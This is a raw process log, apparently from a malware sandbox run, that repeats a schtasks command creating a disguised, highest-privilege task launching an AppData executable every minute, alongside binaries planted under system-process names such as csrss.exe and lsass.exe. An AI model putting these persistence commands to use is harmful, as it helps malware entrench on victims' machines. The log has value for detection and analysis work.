"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Prefetch\ReadyBoot\explorer.exe

C:\Windows\Prefetch\ReadyBoot\explorer.exe

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe

"C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe"

C:\winNet\lsm.exe

C:\winNet\lsm.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\lsm.exe.exe

"C:\winNet\lsm.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Admin\WmiPrvSE.exe

C:\Users\Admin\WmiPrvSE.exe

C:\winNet\lsass.exe

C:\winNet\lsass.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\lsass.exe.exe

"C:\winNet\lsass.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Default User\dllhost.exe

"C:\Users\Default User\dllhost.exe"

C:\Users\Admin\AppData\Local\csrss.exe

C:\Users\Admin\AppData\Local\csrss.exe

C:\DriversavessessionDlldhcp\dwm.exe

C:\DriversavessessionDlldhcp\dwm.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe

"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\DriversavessessionDlldhcp\dwm.exe.exe

"C:\DriversavessessionDlldhcp\dwm.exe.exe"

C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe

"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\spoolsv.exe

C:\winNet\spoolsv.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe

"C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe"

C:\DriversavessessionDlldhcp\Roblox.exe

C:\DriversavessessionDlldhcp\Roblox.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

